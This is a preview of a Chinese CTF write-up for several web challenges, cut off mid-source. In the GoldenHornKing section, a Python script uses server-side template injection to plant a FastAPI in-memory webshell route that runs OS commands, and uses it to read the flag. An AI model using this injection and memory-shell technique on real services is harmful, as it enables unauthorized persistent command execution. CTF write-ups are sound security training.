文章预览
Web EncirclingGame 直接玩,游戏很简单一分钟搞定: GoldenHornKing ssti但是没回显,正好这两天分析python各个框架内存马,直接上个fastapi内存马即可。 import requests url = "http://eci-2zeaztk8i992b5ljndsb.cloudeci1.ichunqiu.com:8000/" def render (calc) : print(requests.get( f" {url} calc" , params={ "calc_req" : calc}).text) code = '''import sys async def ttt(x: str): return __import__("os").popen(x).read() print(sys.modules["__main__"].app.add_api_route("/x", ttt))''' print(render( f"""app.__init__.__globals__['__builtins__']['exec'](''' {code} ''')""" )) print(requests.get( f" {url} x?x=cat /flag" ).text) # "flag{b5ae36fc-bae6-4363-af0c-58b748848019}" php_online from flask import Flask, request, session, redirect, url_for, render_template import os import secrets app = Flask(__name__) app.secret_key = secrets.token_hex( 16 ) working_id = [] @app.route('/', methods=['GET', 'POST']) def
………………………………